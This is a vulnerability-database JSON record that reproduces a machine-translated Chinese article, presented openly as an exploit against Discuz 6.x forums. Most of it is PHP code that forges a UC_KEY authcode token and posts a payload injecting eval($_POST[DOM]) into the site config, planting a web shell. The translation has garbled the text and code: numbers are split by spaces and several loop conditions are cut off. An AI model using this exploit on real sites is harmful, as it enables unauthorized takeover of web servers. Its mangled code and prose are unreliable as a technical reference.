{"id": "MYHACK58:62201569289", "hash": "ee7481e958dff9d006cb67e44b92fac7e6a68de7d8adc7ec7454e8dc5eb43526", "modified": "2015-11-23T00:00:00", "history": [], "published": "2015-11-23T00:00:00", "type": "myhack58", "references": [], "objectVersion": "1.2", "lastseen": "2016-11-11T18:24:14", "edition": 1, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-11-11T18:24:14"}, "dependencies": {"references": [], "modified": "2016-11-11T18:24:14"}, "vulnersScore": -0.3}, "cvelist": [], "hashmap": [{"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "62431aac3b0516ca5138bf3523910997", "key": "description"}, {"hash": "7d8bdb7338ce586a5c59dcfe88fce0f0", "key": "href"}, {"hash": "21696611d742ee2c3099db77022fa31e", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "21696611d742ee2c3099db77022fa31e", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "645396391020478112635e14b34a0f8b", "key": "reporter"}, {"hash": "7d1ab384224a1dfb95fb2dcf5a556fc0", "key": "title"}, {"hash": "0665a8b0792e65b50ab13aef58a018dc", "key": "type"}], "viewCount": 0, "description": "Online dz 7. x and dz x Series uc_key use, today met a dz6. 0 website, so the analysis under the code, The change of use of the program, to share with people in need. uc_key getshell is a relatively wide presence of relatively long vulnerability, basically using the ucenter user center the program can be used, but the need according to the specific program to write a particular use. The latest version of the dz seems to be patched, there is no specific look at the code. \n\nNote three places: 1. In dz6. x FOR xml parsing is not the same, so you need to modify the use of exp $post = uc_unserialize(uc_post_contents()); 2. Low version$UC_API and there is no escape, there is no need to submit 2 Pack $configfile = preg_replace(\"/define\\\\('UC_API',\\s*'.*?'\\\\);/ i\", \"define('UC_API', '$UC_API');\", $configfile); 3. The low version of the encryption function is not the same \nCopy the code \n// Code copyright belongs to the original author all! \n$timestamp = time()+1 0*3 6 0 0; \n$host=\"127.0.0.1\"; \n$uc_key=\"Qfp1O0N3h5V356bbUdPer3958dp8X3b55dba9fkai7s3q7aby9i3hcnc7ec505sa\"; \n$code=urlencode(_authcode(\"time=$timestamp&action=updateapps\", 'ENCODE', $uc_key)); \n$cmd1=' \nhttp://xxx\\');eval($_POST[DOM]);// \n'; \n$html1 = send($cmd1); \necho $html1; \nfunction send($cmd){ \nglobal $host,$code; \n$message = \"POST /dz/api/uc. php? code=\".$ code.\" HTTP/1.1\\r\\n\"; \n$message .= \"Accept: */*\\r\\n\"; \n$message .= \"Referer: \".$ host.\"\\ r\\n\"; \n$message .= \"Accept-Language: zh-cn\\r\\n\"; \n$message .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\"; \n$message .= \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\\r\\n\"; \n$message .= \"Host: \".$ host.\"\\ r\\n\"; \n$message .= \"Content-Length: \". strlen($cmd).\"\\ r\\n\"; \n$message .= \"Connection: Close\\r\\n\\r\\n\"; \n$message .= $cmd; \n$fp = fsockopen($host, 8 0); \nfputs($fp, $message); \n$resp = \"; \nwhile ($fp && ! feof($fp)) \n$resp .= fread($fp, 1 0 2 4); \nreturn $resp; \n} \nfunction _authcode($string, $operation = 'DECODE', $key = \", $expiry = 0) { \n$ckey_length = 4; \n$key = md5($key ? $key : UC_KEY); \n$keya = md5(substr($key, 0, 1 6)); \n$keyb = md5(substr($key, 1 6, 1 6)); \n$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : \"; \n$cryptkey = $keya. md5($keya.$ keyc); \n$key_length = strlen($cryptkey); \n$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0). substr(md5($string.$ keyb), 0, 1 6).$ string; \n$string_length = strlen($string); \n$result = \"; \n$box = range(0, 2 5 5); \n$rndkey = array(); \nfor($i = 0; $i \n$rndkey[$i] = ord($cryptkey[$i % $key_length]); \n} \nfor($j = $i = 0; $i \n$j = ($j + $box[$i] + $rndkey[$i]) % 2 5 6; \n$tmp = $box[$i]; \n$box[$i] = $box[$j]; \n$box[$j] = $tmp; \n} \nfor($a = $j = $i = 0; $i \n$a = ($a + 1) % 2 5 6; \n$j = ($j + $box[$a]) % 2 5 6; \n$tmp = $box[$a]; \n$box[$a] = $box[$j]; \n$box[$j] = $tmp; \n$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 2 5 6])); \n} \nif($operation == 'DECODE') { \nif((substr($result, 0, 1 0) == 0 || substr($result, 0, 1 0) - time() > 0) && substr($result, 1 0, 1 6) == substr(md5(substr($result, 2 6).$ keyb), 0, 1 6)) { \nreturn substr($result, 2 6); \n} else { \nreturn \"; \n} \n} else { \nreturn $keyc. str_replace('=', \", base64_encode($result)); \n} \n} \n?& gt; \n\n", "href": "http://www.myhack58.com/Article/html/3/62/2015/69289.htm", "bulletinFamily": "info", "reporter": "\u4f5a\u540d", "cvss": {"vector": "NONE", "score": 0.0}, "title": "DZ6. x UC_KEY getwebshell exploit-vulnerability warning-the black bar safety net"}

{}